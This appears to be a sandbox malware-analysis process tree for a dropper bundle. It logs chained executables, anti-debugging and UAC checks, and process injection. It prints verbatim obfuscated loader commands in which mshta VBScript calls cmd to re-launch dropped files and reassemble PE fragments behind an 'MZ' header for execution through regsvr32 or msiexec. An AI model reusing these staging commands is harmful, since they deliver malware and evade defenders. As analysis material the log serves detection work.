C:\Users\Admin\AppData\Roaming\6186893.exe"C:\Users\Admin\AppData\Roaming\6186893.exe"8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:896
-
-
C:\Users\Admin\AppData\Roaming\8696598.exe"C:\Users\Admin\AppData\Roaming\8696598.exe"8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3092
-
-
C:\Users\Admin\AppData\Roaming\6255619.exe"C:\Users\Admin\AppData\Roaming\6255619.exe"8⤵PID:664
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCRIPt: cLOsE ( CrEATeoBjEcT ( "wsCrIpt.sHelL" ). RUn ("cmd /C copy /y ""C:\Users\Admin\AppData\Roaming\6255619.exe"" LYCw0J.ExE &&stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF """"== """" for %T in ( ""C:\Users\Admin\AppData\Roaming\6255619.exe"") do taskkill /im ""%~nxT"" /f " , 0 ,tRue ) )9⤵
- Suspicious use of WriteProcessMemory
PID:2332 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Roaming\6255619.exe" LYCw0J.ExE &&stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF ""== "" for %T in ( "C:\Users\Admin\AppData\Roaming\6255619.exe") do taskkill /im "%~nxT" /f10⤵PID:1156
-
C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExELYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj11⤵
- Executes dropped EXE
PID:1476 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCRIPt: cLOsE ( CrEATeoBjEcT ( "wsCrIpt.sHelL" ). RUn ("cmd /C copy /y ""C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE"" LYCw0J.ExE &&stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF ""/ptCSVoYGd9AYAP_3p6Sjuyj ""== """" for %T in ( ""C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE"") do taskkill /im ""%~nxT"" /f " , 0 ,tRue ) )12⤵PID:472
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE" LYCw0J.ExE &&stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF "/ptCSVoYGd9AYAP_3p6Sjuyj "== "" for %T in ( "C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE") do taskkill /im "%~nxT" /f13⤵PID:4860
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCrIPt: cLOsE (cREAteoBject ( "wscRIPT.SHELl"). Run ( "C:\Windows\system32\cmd.exe /q /r ECho L%Time%07> 2B_LH.IT & EcHO | SEt /P = ""MZ"" > RqS~WQ.qCt& copY /Y /b RqS~WQ.QCt +WL4sXR.MY +JkOFKWNK.Eo7 + 2B_LH.IT BGG1KxA.y & DEl WL4sxR.My JkOFkWNk.EO7 2B_LH.IT RQS~WQ.QCT& stArT regsvr32 .\BgG1KXA.y -U -S " ,0 ,TRUe ) )12⤵PID:4524
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /r ECho L%Time> 2B_LH.IT & EcHO | SEt /P = "MZ" > RqS~WQ.qCt& copY /Y /b RqS~WQ.QCt +WL4sXR.MY+JkOFKWNK.Eo7 +2B_LH.IT BGG1KxA.y & DEl WL4sxR.My JkOFkWNk.EO7 2B_LH.IT RQS~WQ.QCT& stArT regsvr32 .\BgG1KXA.y -U -S13⤵PID:5224
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "14⤵PID:5588
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SEt /P = "MZ" 1>RqS~WQ.qCt"14⤵PID:5616
-
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 .\BgG1KXA.y -U -S14⤵PID:5924
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "6255619.exe" /f11⤵
- Kills process with taskkill
PID:4892
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\461592.exe"C:\Users\Admin\AppData\Roaming\461592.exe"8⤵PID:4976
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"9⤵
- Executes dropped EXE
PID:1888
-
-
-
C:\Users\Admin\AppData\Roaming\3187039.exe"C:\Users\Admin\AppData\Roaming\3187039.exe"8⤵
- Executes dropped EXE
PID:2600
-
-
-
C:\Users\Admin\AppData\Local\Temp\4.exe"C:\Users\Admin\AppData\Local\Temp\4.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4360 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:380
-
-
-
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"7⤵
- Executes dropped EXE
PID:4552 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )8⤵PID:5084
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"9⤵PID:4468
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi10⤵
- Executes dropped EXE
PID:4908 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )11⤵PID:500
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"12⤵PID:2032
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )11⤵PID:3688
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC12⤵PID:1108
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "13⤵PID:5288
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"13⤵PID:5340
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC13⤵PID:4376
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "search_hyperfs_206.exe"10⤵
- Kills process with taskkill
PID:3660
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4432
-
-
C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe"C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe"7⤵
- Executes dropped EXE
PID:4308
-
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"7⤵PID:4252
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
- Executes dropped EXE
PID:4608 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4608 -s 7928⤵
- Program crash
PID:1580
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4608 -s 8048⤵
- Program crash
PID:4180
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4608 -s 7768⤵
- Program crash
PID:4376
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4608 -s 8168⤵
- Program crash
PID:4032
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4608 -s 9368⤵
- Program crash
PID:5500
-
-
-
C:\Users\Admin\AppData\Local\Temp\chenxiulan-game.exe"C:\Users\Admin\AppData\Local\Temp\chenxiulan-game.exe"7⤵
- Executes dropped EXE
PID:4832
-
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4948 -
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=18⤵PID:4936
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--ZgwMku75"9⤵PID:6576
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1ec,0x1f0,0x1f4,0x1c8,0x1f8,0x7ffdd598dec0,0x7ffdd598ded0,0x7ffdd598dee010⤵PID:3760
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1680,11090025358964127315,9698412234117696123,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6576_13294871" --mojo-platform-channel-handle=1744 /prefetch:810⤵PID:6248
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1680,11090025358964127315,9698412234117696123,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6576_13294871" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1696 /prefetch:210⤵PID:4540
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1680,11090025358964127315,9698412234117696123,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6576_13294871" --mojo-platform-channel-handle=2292 /prefetch:810⤵PID:5312
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1680,11090025358964127315,9698412234117696123,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6576_13294871" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=2636 /prefetch:110⤵PID:4532
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1680,11090025358964127315,9698412234117696123,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6576_13294871" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2440 /prefetch:110⤵PID:4836
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1680,11090025358964127315,9698412234117696123,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6576_13294871" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=1696 /prefetch:210⤵PID:6480
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1680,11090025358964127315,9698412234117696123,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6576_13294871" --mojo-platform-channel-handle=2120 /prefetch:810⤵PID:2644
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1680,11090025358964127315,9698412234117696123,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6576_13294871" --mojo-platform-channel-handle=2744 /prefetch:810⤵PID:7376
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1680,11090025358964127315,9698412234117696123,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6576_13294871" --mojo-platform-channel-handle=3492 /prefetch:810⤵PID:7844
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1680,11090025358964127315,9698412234117696123,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6576_13294871" --mojo-platform-channel-handle=3180 /prefetch:810⤵PID:5028
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1680,11090025358964127315,9698412234117696123,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6576_13294871" --mojo-platform-channel-handle=976 /prefetch:810⤵PID:7176
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\6.exe"C:\Users\Admin\AppData\Local\Temp\6.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5044 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5044 -s 15008⤵
- Executes dropped EXE
- Program crash
PID:4252
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun0328255c4bce6fb.exe4⤵PID:1516
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun03f5d51697d04.exe4⤵PID:1312
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun038db98f99bf9a.exe4⤵
- Suspicious use of WriteProcessMemory
PID:976
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS49F59695\Sun0328255c4bce6fb.exeSun0328255c4bce6fb.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1944 -
C:\ProgramData\6297519.exe"C:\ProgramData\6297519.exe"2⤵PID:1960
-
-
C:\ProgramData\7200459.exe"C:\ProgramData\7200459.exe"2⤵PID:5528
-
-
C:\ProgramData\4473606.exe"C:\ProgramData\4473606.exe"2⤵PID:5592
-
-
C:\ProgramData\6095290.exe"C:\ProgramData\6095290.exe"2⤵PID:5948
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCRIPt: cLOsE ( CrEATeoBjEcT ( "wsCrIpt.sHelL" ). RUn ("cmd /C copy /y ""C:\ProgramData\6095290.exe"" LYCw0J.ExE &&stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF """"== """" for %T in ( ""C:\ProgramData\6095290.exe"") do taskkill /im ""%~nxT"" /f " , 0 ,tRue ) )3⤵PID:5176
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C copy /y "C:\ProgramData\6095290.exe" LYCw0J.ExE &&stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF ""== "" for %T in ( "C:\ProgramData\6095290.exe") do taskkill /im "%~nxT" /f4⤵PID:1188
-
C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExELYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj5⤵PID:4044
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCRIPt: cLOsE ( CrEATeoBjEcT ( "wsCrIpt.sHelL" ). RUn ("cmd /C copy /y ""C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE"" LYCw0J.ExE &&stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF ""/ptCSVoYGd9AYAP_3p6Sjuyj ""== """" for %T in ( ""C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE"") do taskkill /im ""%~nxT"" /f " , 0 ,tRue ) )6⤵PID:972
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE" LYCw0J.ExE &&stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF "/ptCSVoYGd9AYAP_3p6Sjuyj "== "" for %T in ( "C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE") do taskkill /im "%~nxT" /f7⤵PID:5584
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCrIPt: cLOsE (cREAteoBject ( "wscRIPT.SHELl"). Run ( "C:\Windows\system32\cmd.exe /q /r ECho L%Time%07> 2B_LH.IT & EcHO | SEt /P = ""MZ"" > RqS~WQ.qCt& copY /Y /b RqS~WQ.QCt +WL4sXR.MY +JkOFKWNK.Eo7 + 2B_LH.IT BGG1KxA.y & DEl WL4sxR.My JkOFkWNk.EO7 2B_LH.IT RQS~WQ.QCT& stArT regsvr32 .\BgG1KXA.y -U -S " ,0 ,TRUe ) )6⤵PID:6372
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /r ECho L%Time> 2B_LH.IT & EcHO | SEt /P = "MZ" > RqS~WQ.qCt& copY /Y /b RqS~WQ.QCt +WL4sXR.MY+JkOFKWNK.Eo7 +2B_LH.IT BGG1KxA.y & DEl WL4sxR.My JkOFkWNk.EO7 2B_LH.IT RQS~WQ.QCT& stArT regsvr32 .\BgG1KXA.y -U -S7⤵PID:6740
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "8⤵PID:6408
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SEt /P = "MZ" 1>RqS~WQ.qCt"8⤵PID:1508
-
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 .\BgG1KXA.y -U -S8⤵PID:6728
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "6095290.exe" /f5⤵
- Kills process with taskkill
PID:2124
-
-
-
-
-
C:\ProgramData\3435779.exe"C:\ProgramData\3435779.exe"2⤵PID:616
-
-
C:\Users\Admin\AppData\Local\Temp\7zS49F59695\Sun0397381f1f458e.exe"C:\Users\Admin\AppData\Local\Temp\7zS49F59695\Sun0397381f1f458e.exe" -u1⤵
- Executes dropped EXE
PID:1732
-
C:\Users\Admin\AppData\Local\Temp\7zS49F59695\Sun03f0dc4460bc9.exeC:\Users\Admin\AppData\Local\Temp\7zS49F59695\Sun03f0dc4460bc9.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1096
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R tyPe "C:\Users\Admin\AppData\Local\Temp\7zS49F59695\Sun039750b00c.exe" > wXE1XgqZIR_W9IM.exE && start WXE1XgqzIr_w9IM.eXe -PRt0qXDI7zI &if "" == "" for %m in ( "C:\Users\Admin\AppData\Local\Temp\7zS49F59695\Sun039750b00c.exe") do taskkill -Im "%~Nxm" /F1⤵PID:2784
-
C:\Users\Admin\AppData\Local\Temp\wXE1XgqZIR_W9IM.exEWXE1XgqzIr_w9IM.eXe -PRt0qXDI7zI2⤵PID:3116
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCRipt: CLoSE( createOBJeCT ( "wsCript.ShelL").rUn("cMD.exE /R tyPe ""C:\Users\Admin\AppData\Local\Temp\wXE1XgqZIR_W9IM.exE"" > wXE1XgqZIR_W9IM.exE && start WXE1XgqzIr_w9IM.eXe -PRt0qXDI7zI & if ""-PRt0qXDI7zI "" == """" for %m in ( ""C:\Users\Admin\AppData\Local\Temp\wXE1XgqZIR_W9IM.exE"") do taskkill -Im ""%~Nxm"" /F " , 0 , TrUe ))3⤵
- Suspicious use of WriteProcessMemory
PID:2332 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R tyPe "C:\Users\Admin\AppData\Local\Temp\wXE1XgqZIR_W9IM.exE" > wXE1XgqZIR_W9IM.exE && start WXE1XgqzIr_w9IM.eXe -PRt0qXDI7zI &if "-PRt0qXDI7zI " == "" for %m in ( "C:\Users\Admin\AppData\Local\Temp\wXE1XgqZIR_W9IM.exE") do taskkill -Im "%~Nxm" /F4⤵PID:3284
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCripT: CLOse(CReAteoBjECt ( "wScrIPT.SHeLL"). RuN ( "CmD /C EcHo | sEt /P = ""MZ"" > QKYLkI3.T & CopY /Y /b QKYLkI3.T +KXCn0WxW.e+ 8QfI1D5v.X + 52TbWL.SZV + Y4JTKX.X9 +88N4.I +xU3XyT.P UKHPFGIw.UMV & START msiexec.exe -Y .\UKHPfGIw.UMV " , 0, TRUe ))3⤵PID:4980
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C EcHo | sEt /P = "MZ" > QKYLkI3.T& CopY /Y /b QKYLkI3.T +KXCn0WxW.e+ 8QfI1D5v.X+52TbWL.SZV +Y4JTKX.X9 +88N4.I +xU3XyT.P UKHPFGIw.UMV& START msiexec.exe -Y .\UKHPfGIw.UMV4⤵PID:4176
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "5⤵PID:3068
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>QKYLkI3.T"5⤵PID:4972
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -Y .\UKHPfGIw.UMV5⤵PID:4216
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -Im "Sun039750b00c.exe" /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3100
-
-
C:\Users\Admin\AppData\Local\Temp\is-8ISEB.tmp\Sun03f5d51697d04.tmp"C:\Users\Admin\AppData\Local\Temp\is-8ISEB.tmp\Sun03f5d51697d04.tmp" /SL5="$301CC,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS49F59695\Sun03f5d51697d04.exe"1⤵PID:1120
-
C:\Users\Admin\AppData\Local\Temp\7zS49F59695\Sun03f5d51697d04.exe"C:\Users\Admin\AppData\Local\Temp\7zS49F59695\Sun03f5d51697d04.exe" /SILENT2⤵
- Executes dropped EXE
PID:2980 -
C:\Users\Admin\AppData\Local\Temp\is-MLFI6.tmp\Sun03f5d51697d04.tmp"C:\Users\Admin\AppData\Local\Temp\is-MLFI6.tmp\Sun03f5d51697d04.tmp" /SL5="$1020A,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS49F59695\Sun03f5d51697d04.exe" /SILENT3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:3320 -
C:\Users\Admin\AppData\Local\Temp\is-H4TH0.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-H4TH0.tmp\postback.exe" ss14⤵
- Executes dropped EXE
PID:3980
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS49F59695\Sun03f5d51697d04.exeSun03f5d51697d04.exe1⤵
- Executes dropped EXE
PID:1020
-
